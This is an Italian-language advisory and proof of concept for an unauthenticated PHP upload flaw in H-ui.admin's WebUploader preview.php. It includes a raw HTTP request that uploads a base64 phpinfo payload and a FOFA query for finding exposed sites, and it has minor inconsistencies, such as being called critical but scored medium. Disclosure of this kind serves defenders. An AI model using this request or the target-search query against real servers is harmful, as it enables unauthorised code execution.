
Una vulnerabilità di Remote Code Execution che consente ad attaccanti non autenticati di caricare file PHP arbitrari direttamente sul web server. Ciò comporta un'immediata Remote Code Execution con i privilegi del web server.
Una prova di concetto che sfrutta un'esecuzione remota di codice con privilegi del server web tramite caricamento arbitrario di file.
Esiste una vulnerabilità critica di esecuzione remota di codice nel componente di anteprima WebUploader del sistema H-ui.admin. Il file <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> non dispone di una corretta autenticazione e validazione dei file, consentendo ad attaccanti non autenticati di caricare file PHP arbitrari direttamente sul server web. Ciò comporta un'esecuzione remota di codice immediata con i privilegi del server web.
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

FOFA:
title='Tpadmin'
Un attaccante remoto non autenticato può sfruttare un caricamento arbitrario di file per ottenere un'esecuzione remota di codice con i privilegi del server web.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
Non ci sono informazioni note su possibili contromisure. Potrebbe essere consigliabile sostituire l'oggetto interessato con un prodotto alternativo.
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale.